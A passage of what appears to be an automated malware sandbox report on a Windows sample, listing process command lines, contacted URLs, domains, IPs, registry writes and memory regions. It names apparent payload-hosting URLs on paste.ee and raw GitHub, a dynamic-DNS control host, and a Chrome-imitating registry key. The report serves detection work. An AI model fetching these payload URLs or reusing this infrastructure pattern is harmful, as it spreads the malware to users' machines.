--service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=2016,i,9777007145685273446,11700763769562909530,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1968,i,9602569947055018222,14101658706447688223,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=1500 --field-trial-handle=1492,i,7162340336741099282,8203552688004924699,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2012,i,3848042767598446159,15832118433102009625,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2028,i,15924250175209133703,8349155567450697044,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=1728 --field-trial-handle=1980,i,7225582587041739135,14714490613506234970,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2012,i,8574600569835257597,12503451850514221727,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=1648 --field-trial-handle=1996,i,18342384901192943427,3001916881733487027,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=2008,i,13349874762832594225,9819071068630656309,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
|
||
|
C:\Program Files\Google\Chrome\Application\chrome.exe
|
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US
--service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1984,i,11069439797262297707,896590743492590315,262144
--disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction
/prefetch:8
|
There are 76 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
ab9001.ddns.net
|
|
||
|
https://paste.ee/d/XlUYO/0
|
188.114.97.3
|
|
|
|
https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
|
unknown
|
||
|
https://go.microsoft.co
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
|
unknown
|
||
|
https://www.linkedin.com/cws/share?url=$
|
unknown
|
||
|
https://analytics.paste.ee
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV2.C:
|
unknown
|
||
|
https://paste.ee
|
unknown
|
||
|
https://github.com/Youssef1313
|
unknown
|
||
|
https://aka.ms/msignite_docs_banner
|
unknown
|
||
|
https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9
|
unknown
|
||
|
http://polymer.github.io/AUTHORS.txt
|
unknown
|
||
|
https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://management.azure.com/subscriptions?api-version=2016-06-01
|
unknown
|
||
|
https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md
|
unknown
|
||
|
http://geoplugin.net/json.gp/C
|
unknown
|
||
|
https://aka.ms/pshelpmechoose
|
unknown
|
||
|
https://aka.ms/feedback/report?space=61
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://learn-video.azurefd.net/vod/player
|
unknown
|
||
|
https://cdnjs.cloudflare.com
|
unknown
|
||
|
https://twitter.com/intent/tweet?original_referer=$
|
unknown
|
||
|
https://github.com/gewarren
|
unknown
|
||
|
https://cdnjs.cloudflare.com;
|
unknown
|
||
|
http://polymer.github.io/CONTRIBUTORS.txt
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://secure.gravatar.com
|
unknown
|
||
|
https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md
|
unknown
|
||
|
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
|
185.199.110.133
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
|
unknown
|
||
|
https://client-api.arkoselabs.com/v2/api.js
|
unknown
|
||
|
https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://paste.ee
|
unknown
|
||
|
https://github.com/Thraka
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://polymer.github.io/PATENTS.txt
|
unknown
|
||
|
https://aka.ms/certhelp
|
unknown
|
||
|
https://www.google.com;
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://raw.githubusercont
|
unknown
|
||
|
http://crl.ver)
|
unknown
|
||
|
https://github.com/mairaw
|
unknown
|
||
|
https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
|
13.107.246.44
|
||
|
https://schema.org
|
unknown
|
||
|
http://polymer.github.io/LICENSE.txt
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://aka.ms/yourcaliforniaprivacychoices
|
unknown
|
||
|
http://geoplugin.net/json.gp
|
unknown
|
||
|
https://github.com/nschonni
|
unknown
|
||
|
https://g.live.com/odclientsettings/Prod/C:
|
unknown
|
||
|
https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05
|
unknown
|
||
|
https://github.com/adegeo
|
unknown
|
||
|
https://raw.githubusercontent.com
|
unknown
|
||
|
https://github.com/jonschlinkert/is-plain-object
|
unknown
|
||
|
https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtJhu;
|
unknown
|
||
|
https://octokit.github.io/rest.js/#throttling
|
unknown
|
||
|
http://raw.githubusercontent.com
|
unknown
|
||
|
https://aka.ms/aiskillschallenge/T1LearnBanner?wt.mc_id=aisc25_learnpromo1_website_cnl
|
unknown
|
||
|
https://analytics.paste.ee;
|
unknown
|
||
|
https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2017-0
|
unknown
|
||
|
https://github.com/js-cookie/js-cookie
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schema.org/Organization
|
unknown
|
||
|
https://channel9.msdn.com/
|
unknown
|
||
|
https://themes.googleusercontent.com
|
unknown
|
||
|
https://github.com/dotnet/try
|
unknown
|
||
|
https://oneget.org
|
unknown
|
There are 66 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
paste.ee
|
188.114.97.3
|
|
|
|
ab9001.ddns.net
|
64.188.16.157
|
|
|
|
js.monitor.azure.com
|
unknown
|
|
|
|
mdec.nelreports.net
|
unknown
|
|
|
|
s-part-0016.t-0009.t-msedge.net
|
13.107.246.44
|
||
|
raw.githubusercontent.com
|
185.199.110.133
|
||
|
s-part-0017.t-0009.fb-t-msedge.net
|
13.107.253.45
|
||
|
s-part-0017.t-0009.t-msedge.net
|
13.107.246.45
|
||
|
www.google.com
|
142.250.184.196
|
||
|
s-part-0032.t-0009.t-msedge.net
|
13.107.246.60
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
192.168.2.5
|
unknown
|
unknown
|
|
|
|
64.188.16.157
|
ab9001.ddns.net
|
United States
|
|
|
|
188.114.97.3
|
paste.ee
|
European Union
|
|
|
|
127.0.0.1
|
unknown
|
unknown
|
|
|
|
13.107.246.45
|
s-part-0017.t-0009.t-msedge.net
|
United States
|
||
|
13.107.246.44
|
s-part-0016.t-0009.t-msedge.net
|
United States
|
||
|
13.107.246.60
|
s-part-0032.t-0009.t-msedge.net
|
United States
|
||
|
185.199.110.133
|
raw.githubusercontent.com
|
Netherlands
|
||
|
142.250.184.196
|
www.google.com
|
United States
|
||
|
13.107.253.45
|
s-part-0017.t-0009.fb-t-msedge.net
|
United States
|
||
|
239.255.255.250
|
unknown
|
Reserved
|
There are 1 hidden IPs, click here to show them.
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Chrorne-K04X5E
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Chrorne-K04X5E
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Chrorne-K04X5E
|
WD
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
There are 8 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
400000
|
remote allocation
|
page execute and read and write
|
|
|
|
1568000
|
heap
|
page read and write
|
|
|
|
323F000
|
stack
|
page read and write
|
|
|
|
180E8AFF000
|
trusted library allocation
|
page read and write
|
|
|
|
180E9BA7000
|
trusted library allocation
|
page read and write
|
|
|
|
A4F597E000
|
stack
|
page read and write
|
||
|
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E40000
|
trusted library allocation
|
page read and write
|
||
|
2D01000
|
heap
|
page read and write
|
||
|
1CABA585000
|
heap
|
page read and write
|
||
|
2A59000
|
stack
|
page read and write
|
||
|
2F70000
|
heap
|
page read and write
|
||
|
6940000
|
trusted library allocation
|
page read and write
|
||
|
22448B44000
|
heap
|
page read and write
|
||
|
1C4F5BB0000
|
trusted library section
|
page read and write
|
||
|
1C4FB450000
|
trusted library allocation
|
page read and write
|
||
|
180D6E05000
|
heap
|
page read and write
|
||
|
57BE000
|
stack
|
page read and write
|
||
|
7FF848D90000
|
trusted library allocation
|
page execute and read and write
|
||
|
6110000
|
heap
|
page read and write
|
||
|
3275000
|
heap
|
page read and write
|
||
|
3225000
|
heap
|
page read and write
|
||
|
778E000
|
stack
|
page read and write
|
||
|
3000000
|
heap
|
page read and write
|
||
|
194B891D000
|
heap
|
page read and write
|
||
|
B5834E000
|
stack
|
page read and write
|
||
|
22446C5E000
|
heap
|
page read and write
|
||
|
180D6E80000
|
trusted library allocation
|
page read and write
|
||
|
7FF848D71000
|
trusted library allocation
|
page read and write
|
||
|
32A9000
|
stack
|
page read and write
|
||
|
1C4FB4C0000
|
remote allocation
|
page read and write
|
||
|
31ED000
|
stack
|
page read and write
|
||
|
1CABA4E0000
|
heap
|
page readonly
|
||
|
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
|
22448BA6000
|
heap
|
page read and write
|
||
|
49DB937000
|
stack
|
page read and write
|
||
|
777E000
|
stack
|
page read and write
|
||
|
17B0000
|
unclassified section
|
page execute and read and write
|
||
|
194BA727000
|
trusted library allocation
|
page read and write
|
||
|
703E000
|
stack
|
page read and write
|
||
|
4E2B000
|
stack
|
page read and write
|
||
|
4E6E000
|
stack
|
page read and write
|
||
|
3013000
|
heap
|
page read and write
|
||
|
194D282F000
|
heap
|
page read and write
|
||
|
7FF848C60000
|
trusted library allocation
|
page read and write
|
||
|
1CABA2BE000
|
heap
|
page read and write
|
||
|
2F01000
|
heap
|
page read and write
|
||
|
3006000
|
heap
|
page read and write
|
||
|
180D8E9D000
|
trusted library allocation
|
page read and write
|
||
|
180F1071000
|
heap
|
page read and write
|
||
|
7FF848E60000
|
trusted library allocation
|
page read and write
|
||
|
2E5F000
|
heap
|
page read and write
|
||
|
180DA398000
|
trusted library allocation
|
page read and write
|
||
|
52DE000
|
stack
|
page read and write
|
||
|
180F1260000
|
trusted library section
|
page read and write
|
||
|
723C000
|
stack
|
page read and write
|
||
|
2C02000
|
heap
|
page read and write
|
||
|
678C000
|
stack
|
page read and write
|
||
|
360E000
|
stack
|
page read and write
|
||
|
63FE000
|
stack
|
page read and write
|
||
|
2C87000
|
heap
|
page read and write
|
||
|
2E12000
|
heap
|
page read and write
|
||
|
3221000
|
heap
|
page read and write
|
||
|
7FF848ED0000
|
trusted library allocation
|
page read and write
|
||
|
2E25000
|
heap
|
page read and write
|
||
|
7FF848E60000
|
trusted library allocation
|
page read and write
|
||
|
4C2E000
|
stack
|
page read and write
|
||
|
194D282D000
|
heap
|
page read and write
|
||
|
194B8A30000
|
trusted library allocation
|
page read and write
|
||
|
2E2E000
|
heap
|
page read and write
|
||
|
34D0000
|
heap
|
page read and write
|
||
|
2F7E000
|
stack
|
page read and write
|
||
|
327F000
|
heap
|
page read and write
|
||
|
31F0000
|
heap
|
page read and write
|
||
|
1C4FB460000
|
trusted library allocation
|
page read and write
|
||
|
3E07000
|
unclassified section
|
page execute and read and write
|
||
|
6401000
|
heap
|
page read and write
|
||
|
6800000
|
trusted library allocation
|
page read and write
|
||
|
17F0000
|
unclassified section
|
page execute and read and write
|
||
|
1CABC2C6000
|
heap
|
page execute and read and write
|
||
|
2E80000
|
heap
|
page read and write
|
||
|
1CABA580000
|
heap
|
page read and write
|
||
|
3244000
|
heap
|
page read and write
|
||
|
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
|
3750000
|
heap
|
page read and write
|
||
|
25F0000
|
heap
|
page read and write
|
||
|
3C50000
|
unclassified section
|
page execute and read and write
|
||
|
1CAD4510000
|
heap
|
page read and write
|
||
|
788E000
|
stack
|
page read and write
|
||
|
22448EAB000
|
heap
|
page read and write
|
||
|
3A06000
|
heap
|
page read and write
|
||
|
2C00000
|
heap
|
page read and write
|
||
|
3301000
|
heap
|
page read and write
|
||
|
588E000
|
stack
|
page read and write
|
||
|
39CE000
|
stack
|
page read and write
|
||
|
2BF0000
|
heap
|
page read and write
|
||
|
1CACC45E000
|
trusted library allocation
|
page read and write
|
||
|
17D0000
|
unclassified section
|
page execute and read and write
|
||
|
7FF848E40000
|
trusted library allocation
|
page read and write
|
||
|
49DB7FE000
|
stack
|
page read and write
|
||
|
7FF848BD0000
|
trusted library allocation
|
page read and write
|
||
|
22448F1A000
|
heap
|
page read and write
|
||
|
3080000
|
heap
|
page read and write
|
||
|
22448C8D000
|
heap
|
page read and write
|
||
|
22448B81000
|
heap
|
page read and write
|
||
|
180D6CF0000
|
heap
|
page read and write
|
||
|
63FF000
|
stack
|
page read and write
|
||
|
3DE7000
|
unclassified section
|
page execute and read and write
|
||
|
180D6D50000
|
trusted library allocation
|
page read and write
|
||
|
4E5B000
|
stack
|
page read and write
|
||
|
4B1E000
|
stack
|
page read and write
|
||
|
7DF4993C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CABC2D0000
|
heap
|
page execute and read and write
|
||
|
75FB000
|
stack
|
page read and write
|
||
|
7FF848E90000
|
trusted library allocation
|
page read and write
|
||
|
180DA20D000
|
trusted library allocation
|
page read and write
|
||
|
22448BAA000
|
heap
|
page read and write
|
||
|
22448CA5000
|
heap
|
page read and write
|
||
|
532D000
|
stack
|
page read and write
|
||
|
7FF848C60000
|
trusted library allocation
|
page read and write
|
||
|
194B8AC5000
|
heap
|
page read and write
|
||
|
69FE000
|
stack
|
page read and write
|
||
|
180D8E84000
|
trusted library allocation
|
page read and write
|
||
|
1C4FB2F3000
|
heap
|
page read and write
|
||
|
32FF000
|
stack
|
page read and write
|
||
|
6FFF000
|
stack
|
page read and write
|
||
|
1C4F6D40000
|
trusted library section
|
page readonly
|
||
|
6250000
|
heap
|
page read and write
|
||
|
22448B3A000
|
heap
|
page read and write
|
||
|
1C4FB263000
|
heap
|
page read and write
|
||
|
22448EDC000
|
heap
|
page read and write
|
||
|
22448B39000
|
heap
|
page read and write
|
||
|
6DBE000
|
stack
|
page read and write
|
||
|
7FF848EE0000
|
trusted library allocation
|
page read and write
|
||
|
140E000
|
stack
|
page read and write
|
||
|
1C4F6500000
|
heap
|
page read and write
|
||
|
2FC0000
|
heap
|
page read and write
|
||
|
A4F62FE000
|
stack
|
page read and write
|
||
|
370E000
|
stack
|
page read and write
|
||
|
49DB9BE000
|
stack
|
page read and write
|
||
|
194BA7FC000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F33000
|
trusted library allocation
|
page read and write
|
||
|
7A6E000
|
stack
|
page read and write
|
||
|
2A90000
|
heap
|
page read and write
|
||
|
22448FEA000
|
heap
|
page read and write
|
||
|
194D2886000
|
heap
|
page read and write
|
||
|
3621000
|
heap
|
page read and write
|
||
|
7FF848F4C000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
|
333E000
|
stack
|
page read and write
|
||
|
75CF000
|
stack
|
page read and write
|
||
|
1CABC8B7000
|
trusted library allocation
|
page read and write
|
||
|
1C4FB256000
|
heap
|
page read and write
|
||
|
713C000
|
stack
|
page read and write
|
||
|
6A01000
|
heap
|
page read and write
|
||
|
1CABC3F1000
|
trusted library allocation
|
page read and write
|
||
|
4EDC000
|
stack
|
page read and write
|
||
|
1C4FB160000
|
trusted library allocation
|
page read and write
|
||
|
1CABC402000
|
trusted library allocation
|
page read and write
|
||
|
4E9E000
|
stack
|
page read and write
|
||
|
2E80000
|
heap
|
page read and write
|
||
|
A4F4A7B000
|
stack
|
page read and write
|
||
|
29D0000
|
heap
|
page read and write
|
||
|
4C2B000
|
stack
|
page read and write
|
||
|
2E86000
|
heap
|
page read and write
|
||
|
9C192FF000
|
stack
|
page read and write
|
||
|
506B000
|
stack
|
page read and write
|
||
|
1CABA560000
|
trusted library allocation
|
page read and write
|
||
|
737C000
|
stack
|
page read and write
|
||
|
7FF848BB3000
|
trusted library allocation
|
page execute and read and write
|
||
|
2FB0000
|
heap
|
page read and write
|
||
|
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
|
22448B91000
|
heap
|
page read and write
|
||
|
2E5F000
|
heap
|
page read and write
|
||
|
224486F0000
|
heap
|
page read and write
|
||
|
7FF848CD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
135B000
|
stack
|
page read and write
|
||
|
A4F54FE000
|
unkown
|
page readonly
|
||
|
22448ECD000
|
heap
|
page read and write
|
||
|
22448B50000
|
heap
|
page read and write
|
||
|
2890000
|
heap
|
page read and write
|
||
|
3701000
|
heap
|
page read and write
|
||
|
545E000
|
stack
|
page read and write
|
||
|
A4F5D7E000
|
stack
|
page read and write
|
||
|
17F7000
|
unclassified section
|
page execute and read and write
|
||
|
22448C5D000
|
heap
|
page read and write
|
||
|
723E000
|
stack
|
page read and write
|
||
|
1CAD45F0000
|
heap
|
page read and write
|
||
|
180DA1DC000
|
trusted library allocation
|
page read and write
|
||
|
1C4F5C2B000
|
heap
|
page read and write
|
||
|
7FF848E60000
|
trusted library allocation
|
page read and write
|
||
|
2C61000
|
heap
|
page read and write
|
||
|
22448F0F000
|
heap
|
page read and write
|
||
|
727E000
|
stack
|
page read and write
|
||
|
7FF848BC3000
|
trusted library allocation
|
page execute and read and write
|
||
|
194BAA98000
|
trusted library allocation
|
page read and write
|
||
|
3020000
|
heap
|
page read and write
|
||
|
3012000
|
heap
|
page read and write
|
||
|
A4F59FE000
|
unkown
|
page readonly
|
||
|
2E21000
|
heap
|
page read and write
|
||
|
17D7000
|
unclassified section
|
page execute and read and write
|
||
|
194BAB64000
|
trusted library allocation
|
page read and write
|
||
|
B575F7000
|
stack
|
page read and write
|
||
|
6401000
|
heap
|
page read and write
|
||
|
549E000
|
stack
|
page read and write
|
||
|
175F000
|
stack
|
page read and write
|
||
|
4C1C000
|
stack
|
page read and write
|
||
|
2F01000
|
heap
|
page read and write
|
||
|
22448ED4000
|
heap
|
page read and write
|
||
|
22448B36000
|
heap
|
page read and write
|
||
|
2C7E000
|
heap
|
page read and write
|
||
|
22448B33000
|
heap
|
page read and write
|
||
|
22448B76000
|
heap
|
page read and write
|
||
|
333F000
|
stack
|
page read and write
|
||
|
29C2000
|
system
|
page execute and read and write
|
||
|
180DA205000
|
trusted library allocation
|
page read and write
|
||
|
2E27000
|
heap
|
page read and write
|
||
|
4DDD000
|
stack
|
page read and write
|
||
|
2E39000
|
stack
|
page read and write
|
||
|
1510000
|
unclassified section
|
page execute and read and write
|
||
|
30FD000
|
stack
|
page read and write
|
||
|
7FF848C6C000
|
trusted library allocation
|
page execute and read and write
|
||
|
535D000
|
stack
|
page read and write
|
||
|
2E2E000
|
heap
|
page read and write
|
||
|
1CABA305000
|
heap
|
page read and write
|
||
|
3212000
|
heap
|
page read and write
|
||
|
535E000
|
stack
|
page read and write
|
||
|
7FF848CD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CABC530000
|
trusted library allocation
|
page read and write
|
||
|
B57579000
|
stack
|
page read and write
|
||
|
180D6F74000
|
heap
|
page read and write
|
||
|
2A40000
|
heap
|
page read and write
|
||
|
379E000
|
stack
|
page read and write
|
||
|
1817000
|
unclassified section
|
page execute and read and write
|
||
|
22448C6D000
|
heap
|
page read and write
|
||
|
733F000
|
stack
|
page read and write
|
||
|
22446D08000
|
heap
|
page read and write
|
||
|
2AC0000
|
system
|
page execute and read and write
|
||
|
22446D08000
|
heap
|
page read and write
|
||
|
303F000
|
heap
|
page read and write
|
||
|
322E000
|
heap
|
page read and write
|
||
|
1CABA4D0000
|
trusted library allocation
|
page read and write
|
||
|
22448C9D000
|
heap
|
page read and write
|
||
|
3021000
|
heap
|
page read and write
|
||
|
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F10000
|
trusted library allocation
|
page read and write
|
||
|
2AC2000
|
system
|
page execute and read and write
|
||
|
2CE9000
|
stack
|
page read and write
|
||
|
A4F66FE000
|
unkown
|
page readonly
|
||
|
2E12000
|
heap
|
page read and write
|
||
|
3200000
|
heap
|
page read and write
|
||
|
7FF848EB0000
|
trusted library allocation
|
page read and write
|
||
|
1CABA2C3000
|
heap
|
page read and write
|
||
|
1CABC474000
|
trusted library allocation
|
page read and write
|
||
|
25A9000
|
stack
|
page read and write
|
||
|
704B000
|
stack
|
page read and write
|
||
|
27E9000
|
stack
|
page read and write
|
||
|
3612000
|
heap
|
page read and write
|
||
|
35330FF000
|
stack
|
page read and write
|
||
|
